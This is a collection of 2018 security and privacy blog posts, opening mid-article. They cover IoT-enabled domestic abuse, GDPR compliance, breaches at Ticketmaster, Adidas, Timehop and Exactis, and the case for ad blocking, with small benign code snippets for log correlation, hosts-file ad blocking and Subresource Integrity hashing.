All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There are so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly says the same thing: be mindful of how obvious your record is. A notebook may work for some; text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a notebook than to keep an abuser away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools designed to look like innocuous weather apps that let you record details discreetly, without storing them openly on the device. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.
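The correlation step above can be sketched in code. This is a minimal illustration with entirely hypothetical data and a made-up `correlate` helper: it simply pairs up journal entries and device-log events whose timestamps fall within a tolerance window, which is the kind of cross-referencing an investigator might do by hand.

```python
from datetime import datetime, timedelta

# Hypothetical example data: journal entries kept by the abused partner,
# and timestamped events later obtained from a device's usage statistics.
journal = [
    ("2018-06-01 02:15", "heating turned up to maximum"),
    ("2018-06-03 23:40", "lights flashing repeatedly"),
]
device_log = [
    ("2018-06-01 02:14", "thermostat set to 35C"),
    ("2018-06-02 18:00", "door unlocked"),
    ("2018-06-03 23:41", "bulb toggled 20 times"),
]

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M")

def correlate(journal, device_log, tolerance_minutes=10):
    """Return (journal note, device event) pairs whose timestamps
    fall within the given tolerance of each other."""
    matches = []
    for j_ts, j_note in journal:
        for d_ts, d_event in device_log:
            if abs(parse(j_ts) - parse(d_ts)) <= timedelta(minutes=tolerance_minutes):
                matches.append((j_note, d_event))
    return matches

print(correlate(journal, device_log))
```

Here both journal entries line up with device events to within a minute or two, while the unexplained "door unlocked" event matches nothing; it's exactly that pattern of agreement that makes independently kept records persuasive.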

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” the abuser, which is keeping at least one compromised device running to make them think all is well, is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top search engine results for help with these types of attack lead to 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

The GDPR Evolution: A Letter to the CISO

The long-term impact of the General Data Protection Regulation (GDPR) is on the minds of key technology leaders around the world — from Singapore to Ireland to my current home of Austin, Texas to everywhere in between. You can see this manifest in major tech publications like SecurityIntelligence (and, perhaps, in the day-to-day interactions occurring within your organization).

For me, these sentiments were echoed during a several-week, multi-continent business trip I took to visit with clients and partners in Europe and Asia. Nearly every leader we sat down with asked us how they should be shepherding their teams through the enforcement of this transformative regulation and who should lead this effort between the security and privacy teams.

This state of confusion is not surprising, especially given the hype surrounding GDPR. A recent IBM Institute for Business Value (IBV) survey found that 44 percent of executives responsible for GDPR compliance worried the regulation would be replaced or modified sometime in the near future. This perception undoubtedly muddies the waters and influences their approach to compliance.

Even with enforcement live, it’s still somewhat unclear what GDPR compliance truly means for organizations worldwide; how it will impact people, process and technology; and (even more importantly) how it will affect relationships with customers.

But one thing is abundantly clear: GDPR is here to stay.

Who Is Responsible for GDPR Compliance?

Let’s take a step back for a moment to reflect on where we started. GDPR originated as a means to help infuse a higher standard of privacy into global business practices and give data subjects from the European Union (EU) more control over their personal information — a sovereignty that was challenged somewhat by the digital data explosion of the past decade. While the regulation only technically applies to EU data subjects, it signals a shift in how we think about privacy everywhere.

This redistribution of control in favor of consumers is a good thing. As security professionals, this supports our highest calling, which is to protect personal data in the face of cyber uncertainty. Ensuring data privacy is a core component of this mission — and the spirit of GDPR supports this goal. Some organizations recognize the importance of data privacy. In fact, 59 percent of respondents to the IBV study said they see GDPR as an occasion for transformation. Still, challenges remain.

Some of the pain originates from the fact that ownership of GDPR compliance initiatives shifted between 2016 (when the legislation was passed) and May 25, 2018 (when the regulation took effect). Originally, legal teams bore the core responsibility for validating the internal processes and controls that would drive the progression toward supporting GDPR requirements. This has morphed into a discussion led by chief information officers (CIOs) and chief information security officers (CISOs) about the implementation of technical controls, the creation of special teams, the appointment of chief data officers (CDOs) and the reshaping of organizational privacy processes to support the stringent requirements, such as a customer’s right to erasure.

Today, the responsibility is shared among technical teams, as well as CIOs and CISOs, who serve as the establishers, enablers and enforcers of a comprehensive GDPR program backed by robust technical controls. This accountability will likely remain for the foreseeable future — no pressure, though.

Collaboration is a key component of GDPR success, but the transition of responsibilities between teams is a challenge. I saw this in practice while visiting Singapore several weeks ago, when leaders repeatedly asked where to begin so they could be ready to answer the GDPR audit inquiries they expect to receive very soon.

Yes, the structures were in place from the legal side to support GDPR readiness, but now it’s game time. Despite years of effort to prepare for this moment, many technology leaders are still left scratching their heads, unsure of what comes next.

What Solutions Should CISOs Invest in to Get on Track?

According to the IBV study, the number one struggle among the surveyed group was performing data discovery and ensuring data accuracy, which is a principal task of GDPR preparation (and the first step for many). This issue illustrates the complex nature of operationalizing all the plans that have been made to get us to (and, hopefully, past) this point.

This point is where technology solutions and services can provide support. Unfortunately, although many vendors might want you to believe otherwise, there’s no silver bullet to establishing GDPR readiness or enforcing the new requirements across your organization. This behemoth of a compliance regulation requires a programmatic approach, but it can often be difficult to see the forest for the trees.

My suggestion: Remember that you don’t have to reinvent the wheel.

There are countless industry frameworks — including IBM’s own GDPR framework, a continuous loop outlining five key phases for readiness — that can serve as your guide. The fact that these guidelines are based on the experiences of others can provide some peace of mind.

It’s also a great idea to leverage a trusted partner or adviser to guide you throughout your readiness and enforcement processes. Rather than going it alone, lean on the organizations that already have deep expertise in the privacy space and can use that insight to help your company avoid missteps as you implement processes and select technologies.

Finally, when it comes to implementing requisite technology controls, I would advise you to think about the regulation and follow a risk-based approach to conducting business with consumers. Consider the data you’re being asked to protect and how it relates to your customers: What personal or sensitive information does your organization hold? Where does it live? Is it actually vulnerable to compromise? Have you taken the necessary steps to put privacy and security protections into place?

As a first step toward gaining this understanding, you should investigate solutions that help identify and remediate risk, such as Guardium Analyzer, which can help you find and classify GDPR-relevant data, irrespective of where it resides (whether on-premises or in the cloud); identify vulnerabilities associated with that data; and, ultimately, prioritize existing risks and take action to remediate them.

The Secret to GDPR Compliance Is Collaboration

During my last customer visit of the trip, a CISO expressed confidence that her organization could respond to GDPR demands from a legal standpoint. She is now building a technology team, with members drawn from the privacy and security teams, to assess and validate vulnerabilities without exposing the personally identifiable data deployed across multiple geographies and data center environments, both on-premises and in the cloud.

As you continue on your GDPR journey, don’t forget the importance of collaboration in making compliance happen — across teams, with business partners and even with your customers — so that you can best support the positive aims of GDPR today and in the future.

Sign Up for a 30-Day Free Trial of IBM Security Guardium Analyzer

DISCLAIMER: Clients are responsible for ensuring their own compliance with various laws and regulations, including the European Union General Data Protection Regulation. Clients are solely responsible for obtaining advice of competent legal counsel as to the identification and interpretation of any relevant laws and regulations that may affect the clients’ business and any actions the clients may need to take to comply with such laws and regulations. The products, services, and other capabilities described herein are not suitable for all client situations and may have restricted availability. IBM does not provide legal, accounting or auditing advice or represent or warrant that its services or products will ensure that clients are in compliance with any law or regulation.

Learn more about IBM’s own GDPR readiness journey and our GDPR capabilities and offerings to support your compliance journey here.

The post The GDPR Evolution: A Letter to the CISO appeared first on Security Intelligence.

Security newsround: July 2018

We round up reporting and research from across the web about the latest security news and developments. This month: stress test for infosec leaders, cybercrime by the numbers, financial fine for enabling cyber fraud, third party risk leads to Ticketmaster breach, Privacy Shield in jeopardy, and a win for Wi-Fi as security improves.

Under pressure: stress levels rise for security professionals

Tense, nervous headache? You might be working in information security. A global survey of 1,600 infosec leaders has found that the role is under more stress than ever. Rising malware threats, a shortage of skilled people, and budget constraints are producing a perfect storm of pressure on professionals. The findings come from Trustwave’s 2018 Security Pressures Report. It found that the trend of increasing stress has been edging steadily upwards since its first report five years ago.

Some 54 per cent of respondents experienced more pressure to secure their organisation in 2017 compared to the previous year. More than half (55 per cent) also expect 2018 to bring more pressure than 2017 did. Dark Reading quoted Chris Schueler of Trustwave saying the pressure to perform will push security leaders to improve performance or burn out. SecurityIntelligence led with the angle that the biggest obligation facing security professionals is preventing malware. Help Net Security has a thorough summary of the findings.

There was some good news: fewer professionals reported feeling pressure to buy the latest security tech compared to past years. The full report is available to download here.

CEO fraud scam hits companies hard

CEO fraud, AKA business email compromise, was the internet crime most commonly reported to the FBI during 2017. Victims lost a combined total of more than $676 million last year, up almost 88 per cent compared to 2016. Cybercrime-related losses overall totalled $1.42 billion last year. The data comes from the FBI’s 2017 Internet Crime Report, which it compiles from public complaints to the agency. (No vendor surveys or hype here.)

The next most prominent scams were ransomware, tech support fraud, and extortion, the FBI said. Corporate data breaches rose slightly in number year on year (3,785 in 2017, up from 3,403 in 2016) but the financial hit decreased noticeably ($60.9 million in 2017 vs $95.9 million in 2016). There were broadly similar numbers of fake tech support scams between 2017 and 2016, but criminals almost doubled their money. The trends in the report could help security professionals to evaluate potential risks to their own organisation and staff.

Asset manager’s lax oversight opens door to fraud and a fine

Interesting reading for security and risk professionals in the Central Bank of Ireland’s highly detailed account of a cyber fraud. Governance failings at Appian Asset Management led to it losing €650,000 in client funds to online fraud. Although Appian subsequently replaced the funds in the client’s account, the regulator fined the firm €443,000. A CBI investigation uncovered “significant regulatory breaches and failures” at the firm, which exposed it to the fraud. It’s the first time the Irish regulator has imposed such a sanction for cyber fraud.

The fraud took place over a two-month period, starting in April 2015. The CBI said a fraudster hacked the real client’s webmail account to impersonate them during email correspondence with an Appian employee. The fraudster also used a spoofing technique to mimic that employee’s email address. The criminal intercepted messages from the genuine client and sent replies from the fake employee email to hide traces of the scam.

The press release runs to more than 3,200 words, and also goes into great detail about the gaps in policy and risk management at Appian.

Tales from the script: third-party app flaw leads to Ticketmaster data breach

As growing numbers of websites rely on third-party scripts, it’s vital to check they don’t put sites’ security at risk. That’s one of the lessons from the data breach at Ticketmaster UK. The company discovered malicious code running on its website that was introduced via a customer chat feature. This exposed sensitive data, including payment details, of around 40,000 customers. Anyone who bought a ticket on its site between September 2017 and June 2018 could be at risk, Ticketmaster warned.

On discovering the breach, Ticketmaster disabled the code across all its sites. The company contacted all affected customers, recommending they change their passwords. It published a clearly worded statement to answer consumer questions, and offered free 12-month identity monitoring.

Although this first seemed like good crisis management and proactive breach notification, the story didn’t end there. Inbenta Technologies, which developed the chat feature, weighed in with a statement shifting some blame back towards Ticketmaster. The vulnerability came from a single piece of custom JavaScript code Inbenta had written for Ticketmaster. “Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customised script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability,” Inbenta CEO Jordi Torras said.

Then Monzo, a UK bank, blogged in detail about the steps it took to protect its customers from the fallout. This included the bombshell that Ticketmaster knew about the breach in April, although the news only went public in June. Wired said these developments showed the need to thoroughly investigate potential breaches, and to remember subcontractors when assessing security risks.

Privacy Shield threat puts EU-US data sharing in doubt

US authorities have two months to start complying with Privacy Shield or else MEPs have threatened to suspend it. The EU-US data sharing framework replaced the Safe Harbor framework two years ago. Privacy Shield was supposed to extend the same rights for protecting EU citizens’ data as they have in Europe. In light of the Facebook-Cambridge Analytica scandal (both companies were certified under Privacy Shield), it seems that’s no longer the case.

MEPs consider privacy and data protection as “fundamental rights … that cannot be ‘balanced’ against commercial or political interests”. They voted 303 to 223 in favour of suspending the Privacy Shield agreement unless the US complies with it.

This could have implications for any organisation that uses a cloud service provider in the US. If they are using Privacy Shield as an adequacy decision for that agreement, they may no longer be GDPR-compliant after 1 September. Expect more developments on this over the coming months.

Welcome boost for Wi-Fi security

The Wi-Fi Alliance’s new WPA3 standard promises enhanced security for business and personal wireless networks. It will use a key establishment protocol called Simultaneous Authentication of Equals (SAE) which should prevent offline dictionary-based password cracking attempts. Announcing the standard, the Wi-Fi Alliance said the enterprise version offers “the equivalent of 192-bit cryptographic strength, providing additional protections for networks transmitting sensitive data, such as government or finance”. Hardware manufacturers including Cisco, Aruba, Broadcom and Aerohive all backed the standard.

Tripwire said WPA3 looks set to improve security for open networks, such as guest or customer networks in coffee shops, airports and hotels. The standard should also prevent passive nearby attackers from being able to monitor communication in the air. The Register said security experts have welcomed the upgrade. It quoted Professor Alan Woodward, a computer scientist at the University of Surrey in England. The new form of authentication, combined with extra strength from longer keys, is “a significant step forward”, he said.


The post Security newsround: July 2018 appeared first on BH Consulting.

Timehop admits attacker stole 21 million users’ data

Timehop, a popular app that reminds you of your social media posts from the same day in past years, is the latest service to suffer a data breach. The attacker struck on July 4th, and grabbed a database which included names and/or usernames along with email addresses for around 21 million users. About 4.7 million of those accounts had phone numbers linked to them, which some people use to log in with instead of a Facebook account.

Via: The Register

Source: Timehop

Everybody and their mother is blocking ads, so why aren’t you?

This post may ruffle a few feathers. But we’re not here to offer advice to publishers on how to best generate revenue for their brand. Rather, we’re here to offer the best advice on how to maintain a safe and secure environment.

If you’re not blocking advertisements on your PC and mobile device, you should be! And if you know someone who isn’t blocking ads, then forward this post to them. Because in this two-part series, we’re going to dispel some of the myths surrounding ad blocking, and we’ll cover the reasons you should be blocking ads on your network and devices.

We’ll then follow up in Part 2 of this series by discussing common tools and configurations to help you get the most out of your browsing experience.

You’ve heard the talk and seen the messages in online banners. You’re aware of the disputes and the provocation from publishers and advertisers that ad blocking is a morally unconscionable act whose users deserve outright banishment from the web. Maybe you’ve been swayed by the pleas from website owners and have empathy towards the fragile budgetary constraints of your favorite sites. Or maybe you don’t understand the risks associated with online tracking and advertising and think that if you don’t click ads you’ll be fine.

Don’t be fooled. Ad blocking provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information. Blocking online ads and trackers has the added benefits of conserving bandwidth and battery life, boosting website response times, and generally improving the overall user experience. So using an ad blocker not only protects your device, it makes browsing more pleasant. What’s not to love?
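To give a taste of the mechanics (Part 2 covers proper tools and configurations), the crudest form of ad blocking is a hosts-file entry that points a known ad or tracker domain at an unroutable address, so the request never leaves your machine. The domains below are purely illustrative placeholders, not real ad servers:

```
# /etc/hosts (Linux/macOS) or C:\Windows\System32\drivers\etc\hosts
# 0.0.0.0 is unroutable, so lookups for these hosts simply fail
# before any ad or tracking payload can be fetched.
0.0.0.0  ads.example.com
0.0.0.0  tracker.example.net
```

Dedicated blockers are far more capable than this, but the principle is the same: if the request for the ad never completes, neither the creative nor any malicious payload it carries ever reaches your browser.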

It’s all a bunch of hullabaloo!

Advertisers, publishers, and website owners despise talk of blocking the pesky advertisements that appear on their webpages—especially the ads that more aggressively vie for attention (and thus pay the website owners’ bills). We’ve all seen them. We’re talking about the ads that auto-play commercials or news clips as soon as the page is loaded. Bright, flashy popups, and page overlays that have to be clicked before seeing the desired content. Even the sponsored results that appear in search listings.  They are everywhere!

Hundreds of billions of ad impressions occur each month, and digital ad revenue for online advertising is estimated to top $237 billion in 2018. With so many impressions to be served, it’s no wonder that website operators are clearing space and making way for advertisers to clutter the website landscape.

Search listing shown inside Google

And we get that ad impressions are the lifeblood of many website operators and publishers who rely on clicks as the primary mechanism to create revenue. Some may even argue that ‘clicks create jobs’.

But let’s face it. In most cases, ads suck! Advertisers like to push the notion of “acceptable ads,” “non-intrusive advertising,” and “reasonable number of impressions,” but this is rhetoric designed to sway the opinion of an impressionable society—and it’s all a bunch of poppycock if you ask me.

Most people don’t like advertisements. They never have. That’s why VCRs became popular back in the ’80s. The devices allowed users to set up recordings and then skip commercials at their convenience later. It’s why DVRs became mainstream years ago, and why people flock to streaming services like Netflix now. It’s even the reason why people skip the first few minutes of a movie.

Ads diminish the overall user experience by forcing the consumer’s attention elsewhere and delaying access to the preferred content. A website’s “sponsored” listings often consume more of the page than actual content, which means more time spent hunting for desired items. This can lead to consumers paying more than they would have paid with a non-sponsored competitor. And then there are the ads that are purposefully obnoxious or play recurring sounds in a small box in the corner of the window. These are all just terrible to endure.

If it were a matter of simply not enjoying the content, then this point would be debatable. But, online advertisements pose a threat and provide an infection vector for malicious actors to launch targeted malware attacks. This can turn even the most reputable websites into potential delivery systems for malware authors.

Malware can be delivered inside that ad

Modern ad formats allow for fun, flashy creatives that can play games and run quizzes, but at the same time this functionality poses great risk to consumers.

Malvertising has the ability to affect even the most careful of users due to the nature of how advertisements are designed to automatically run code when they are loaded. Attackers may (and do) attach craftily hidden exploit code to otherwise innocuous looking ads for well-known products and then submit these ads for publication to known and reputable websites.

Don’t be fooled by this Best Buy ad. It’s not real!

While many of the large ad networks perform due diligence and scan for such malicious content prior to publication, there are dozens, if not hundreds of ad networks to which a criminal can submit their malicious code. And not all of those companies possess the same standards as their multi-billion dollar counterparts. Taking into account the speed and nature of the real-time bidding process for online ads (a fascinating process that deserves a post unto its own) it’s not surprising that bad ads can get past even the most well-intentioned ad networks.

$5.00 and 10 minutes is all it takes with this ad network.

Consider for a moment this blog post released by Google earlier this year, which sheds some light on the number of malicious ads blocked through the ad ecosystem. In the post, Google states that 3.2 billion ads were removed in 2017 for violating advertising policies. That translates to roughly 100 advertisements removed every single second, of every day, for the entire year! Of these ads, 79 million were pushing malware-laden websites. And that’s in addition to the more than 320,000 publishers that were blacklisted, and over 1 million websites and apps that were removed or blocked.
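As a sanity check, the per-second figure falls straight out of the arithmetic:

```python
# Back-of-the-envelope check of the figures from Google's 2017 "bad ads" post.
ads_removed = 3_200_000_000            # ads removed in 2017
seconds_per_year = 365 * 24 * 60 * 60  # 31,536,000 seconds

ads_per_second = ads_removed / seconds_per_year
print(f"{ads_per_second:.0f} ads removed per second")
```

That works out to just over 100 ads removed per second, sustained around the clock for a full year.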

That’s a lot of bad ads!

Setting aside Google’s ability to block malicious content as it appears on their network, some may contend that with so much bad stuff out there, some things are bound to slip through the cracks every once in a while.

And, lest we forget, there are a plethora of other website, news, and advertising companies without the means or desire to police the content. Malicious actors can launch highly-targeted campaigns, which may be visible to only a small handful of people, and which can often fly under the radar of security mechanisms and systems. Who out there wants to be the guinea pig and offer up their computer to the attackers when such lapses occur?

Don’t track me, bro

We’re all familiar with the Cambridge Analytica scandal involving the collection of approximately 87 million Facebook records. The highly-publicized event has led to insolvency proceedings against the company (though Cambridge Analytica may have been recently resurrected under the name Data Propria). People were outraged in part because the company had covertly collected and stored information on large swaths of the population without their consent. But what those same people may not understand is that Cambridge Analytica is not alone in this practice.

There are numerous organizations ranging from small one and two person operations, all the way up to mega-million dollar corporations that are involved in the process of collecting and selling consumer data. Data brokers, data warehouses, and data exchange platforms all provide tools and services to not only collect information, but also sort and organize the information in a manner that allows advertisers to target specific groups of users.

Online data broker offering “data that is only seconds old”

Few of these organizations have the express consent from users to harvest and store their information, and many lack even the most basic of security protocols to protect and maintain the information after it’s collected.

Consider the recent database exposure surrounding the data broker Exactis. The company has been accused of running a poorly-secured server, which exposed nearly 340 million individual records containing everything from addresses, telephone numbers, and email addresses, to more than 400 different data points for habits, interests, and hobbies. All sorts of other personal details are tracked, harvested, and stored in these databases; everything from age all the way down to a person’s clothing size and shopping history. Do you smoke, drink, or enjoy gambling? That’s in there, too.

Exactis has over 3.5 billion records, with information on most of us

And who exactly is Exactis? The company claims to be a leading compiler and aggregator of business and consumer data. The information collected by the company is used for customer profiling and to assist marketers in identifying descriptive traits and customer segments to help better understand behavior. This information can then be used to direct targeted advertising to specific groups.

The company website claims to possess 3.5 billion records on 218 million individuals and 110 million households. When asked where the information originated, Night Lion Security founder Vinny Troia was quoted as saying, “It seems like this is a database with pretty much every US citizen in it. I don’t know where the data is coming from, but it’s one of the most comprehensive collections I’ve ever seen.”

While we may not know for certain, it’s probably a safe assumption that at least some of those records are obtained through the use of online trackers, and services that run silently in the background, tracking and logging your behavior each time you browse online.

Why do we continue to tolerate this sort of illicit data collection? Don’t be like Steve Huffman, the Reddit CEO who allowed himself to be targeted by a Facebook advertisement for the purpose of an employment solicitation.  Instead, use an ad blocker, which not only blocks the targeted trackers that are compromising your personal information and divulging your secrets to the highest bidder, but will also prevent the targeted ad from being shown, thus, reducing your exposure to infection and solicitation.

No, it’s not morally unconscionable to use an ad blocker

Despite the notices, pleas from website owners, and the position from advertisers and publishers that ad-blocking will destroy the internet as we know it, there are no laws against using an ad blocker to prevent objectionable content from appearing on any device that you own or use.

In a long-followed case that went all the way to the German Supreme Court, European publisher Axel Springer was defeated in a years-long battle against Adblock Plus publisher Eyeo, after failing to persuade the court that the ad blocker violated competition law and was engaging in legally-dubious business policies. (Eyeo’s business model allows for unblocking ads deemed “acceptable,” as well as ads from those who pay for such distinction.)

The court ruling puts an end to Springer’s quest to have ad blocking deemed illegal. The ruling also vindicates users’ continued use of blocking software to prevent unwanted or objectionable content from being shown.

Americans are likely to have equally strong, if not stronger, ad blocking protections than our German friends.

A search through available dockets and filings turns up not a single case in which Eyeo, the parent company of Adblock Plus, has been required to defend its practice of blocking advertisements. And really, it’s almost a bit of a stretch to envision an American jury being persuaded by the argument that advertisers have the right to display content, but consumers don’t possess the right to block said content when they don’t approve.

Therefore, with no laws preventing the use of an ad blocker, and with the counter argument simply reduced to the corporate mantra of “maximizing profits,” consumers are free to choose the security policy that best fits their needs.

Convinced yet?

We’ve seen that ads not only diminish the user experience of ingesting content, but that they also pose a substantial risk to consumers.

The potential for malvertising to successfully deploy a nasty payload to your machine, which may compromise your system and jeopardize your financial security, is real. Worse yet, these types of attacks don’t even require user interaction and can execute merely by visiting the page.

And if the threat of financial ruin is of no concern, then the privacy-invading act of data harvesting should be.

The array of data collectors and data brokers out there is mind boggling, and they are all struggling to associate your actions and behaviors to groups and other individuals for no other purpose than to create targeted ads and increase profits. The information collected by these organizations may be poorly secured and is a potential gold mine for any cybercriminal.

And if the moral conviction of blocking the advertisements of your favorite websites has thus far prevented the adoption of ad-blocking technology, then the knowledge of an ever-growing advertising ecosystem and the lack of laws preventing ad-blocking mechanisms should ease those concerns. Yes, we all want to generate revenue for our brand, but personally I’d rather not help do that at the cost of potential identity theft or, worse, having my PC compromised by a malware attack originating from a rogue advertisement on a popular website.

Coming up 

In Part 2 of this series, we’re going to have a look at some of the common ad-blocking utilities and how to configure those tools to fit the needs of the individual user. We’ll show how to navigate user-friendly settings that are simple enough to use on Grandma’s computer. We’ll also take a deep dive into some more advanced configurations and tools that may require a shift in user mind-set, usage, and understanding before fully realizing the benefits such configurations provide.

We’ll cover blocking ads on both mobile and PC devices, as well as configuring a network solution to block ads throughout your entire environment.

So stay tuned to the Malwarebytes blog, or follow this post and we’ll update it with links once available.

The post Everybody and their mother is blocking ads, so why aren’t you? appeared first on Malwarebytes Labs.

Smashing Security #085: Doctor Who, Facebook patents, and Bob’s Burgers


Doctor Who’s TARDIS has sprung a data leak, Facebook’s creepy patents are unmasked, and an app to keep women safe on dates has surprising origins.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

California Passes New Privacy Law

The California legislature unanimously passed the strongest data privacy law in the nation. This is great news, but I have a lot of reservations. The Internet tech companies pressed to get this law passed out of self-defense. A ballot initiative was already going to be voted on in November, one with even stronger data privacy protections. The author of that initiative agreed to pull it if the legislature passed something similar, and that's why it did. This law doesn't take effect until 2020, and that gives the legislature a lot of time to amend the law before it actually protects anyone's privacy. And a conventional law is much easier to amend than a ballot initiative. Just as the California legislature gutted its net neutrality law in committee at the behest of the telcos, I expect it to do the same with this law at the behest of the Internet giants.

So: tentative hooray, I guess.

Major data breaches at Adidas, Ticketmaster pummel web users

There have been a number of data breaches and accidental data exposures coming to light in the last few days, and no matter where in the world you happen to be located, you’ll want to do some due diligence and see if you’ve been affected. These aren’t small fish being preyed upon by black hats; we’re talking Adidas, Ticketmaster, and Exactis, the last one being a particularly big issue, despite being a company you may not have even heard of until now. Shall we take a look?

This breach isn’t very sporting

Adidas, famous sporting equipment creator, revealed a breach in a somewhat short public statement late on Thursday evening. They stated:

According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords. Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.

While there’s no information on exact numbers at this stage beyond references to “a few million,” they do mention that the only customers affected so far are thought to be those who made a purchase via

Something of note: They claim to have first noticed the breach on June 26 and made a public notification two days later. In a realm where huge data breaches can be revealed many months or in some cases years after an attack has taken place, this is impressive (though also now required by GDPR).

It’s important to recognise, however, that at this point, we don’t know if the breach itself took place on June 26 or if Adidas became aware of it on that date, because it sounds as though someone noticed a third party trying to sell the stolen data. All the same, this is a rapid turnaround and helpful for anyone wishing to keep an eye on transactions after having used the above Adidas portal.

The golden ticket

The UK didn’t escape from the blast of breaches rumbling on beneath the surface, as the massive ticket sales/distribution company Ticketmaster fell foul of payment data shenanigans. A code library used to power a third-party customer support agent is claimed to have been sending payment data to an unknown third party whenever a customer bought tickets. According to the statement provided by the support tool’s creators, a single unauthorised line of JavaScript was all it took to cause the problem.

That single line of code, implemented on the payment page, has resulted in up to 40,000 people having their data swiped. If you made a payment somewhere around February to June this year, or anything from September 2017 to this week if you’re an international customer, you could be at risk. Where this story becomes particularly problematic is that digital bank Monzo claims they tried to warn Ticketmaster about the problem back in April of this year, but their warnings went unheeded. Now they’re faced with a so-called perfect storm of bad comms and a significantly harsher round of press-related spotlights.
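One established defence against tampered third-party scripts of this kind is Subresource Integrity (SRI): the page embedding the script pins the hash of the version it expects, and a script altered by even one line fails the browser’s check and never runs. A minimal sketch of computing the SRI value in Python (the widget script and CDN URL are made-up examples):

```python
import base64
import hashlib

def sri_hash(script_bytes: bytes) -> str:
    """Compute a Subresource Integrity value (sha384 is the common choice)."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

# Example: pin a (hypothetical) third-party support widget.
script = b"console.log('support widget v1.0');"
print(f'<script src="https://example-cdn.test/widget.js" '
      f'integrity="{sri_hash(script)}" crossorigin="anonymous"></script>')
```

If the third party ships even a single altered line, the hash no longer matches and the browser refuses to execute the script.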

Fixing a leak

This last incident is less about payment information and more about personal information. It’s also more accurately described as a potential accidental exposure of information, which others may have accessed without permission. Exactis, a marketing firm with a “universal data warehouse” storing 3.5 billion consumer, business, and digital records, have found themselves at the heart of the controversy due to researcher Vinny Troia finding a large slice of data on a publicly-accessible server.

The data are made up of some 340 million records, weighing in at about 2 terabytes. The records contained incredibly detailed information on American consumers, including home addresses, phone numbers, emails, and other “personal characteristics,” including habits, children’s ages, and more. At time of writing, no payment or social security information has been found—so that’s one small silver lining.

However, anyone caught up in the exposed data could find themselves at increased risk of phishing or social engineering attacks if criminals were able to dig into it before the researcher sounded the alarm. It also means bad actors could potentially use detailed information to impersonate the person on file and use that to social engineer someone else.

What can I do?

Unfortunately, there’s only so much you can do in front of your computer where a breach is concerned, because unlike the device in front of you, it’s almost entirely out of your hands. When data is exposed, or someone grabs a pile of payment information, much of what happens next is down to the company responsible for safekeeping. Are payment records encrypted? Are passwords recorded in plain text? Is your entire personal history sitting on a server somewhere, ready to be grabbed by a crew of black hats or a curious observer?

A touch alarming, perhaps, but that’s the reality of doing business online, whether you’re looking to buy something, register somewhere, or simply hand over marketing information while browsing the web. If you’re caught in a breach or a leak, then perform due diligence and cancel your cards, heighten your awareness for phishing/social engineering scams, and take advantage of the typically free credit monitoring services offered post incident. If you follow those directions, you’re doing everything you can to keep things under control on your end.

The important thing to remember is not to panic, and don’t feel too bad should you believe your information to be compromised. We’re probably all going to end up in that position at some point, so you’re in good company.

The post Major data breaches at Adidas, Ticketmaster pummel web users appeared first on Malwarebytes Labs.

The Safety of Your Data On Social Media

Trend Micro recently asked a simple question on Twitter, “Are you worried about the safety of your data when using social media?”


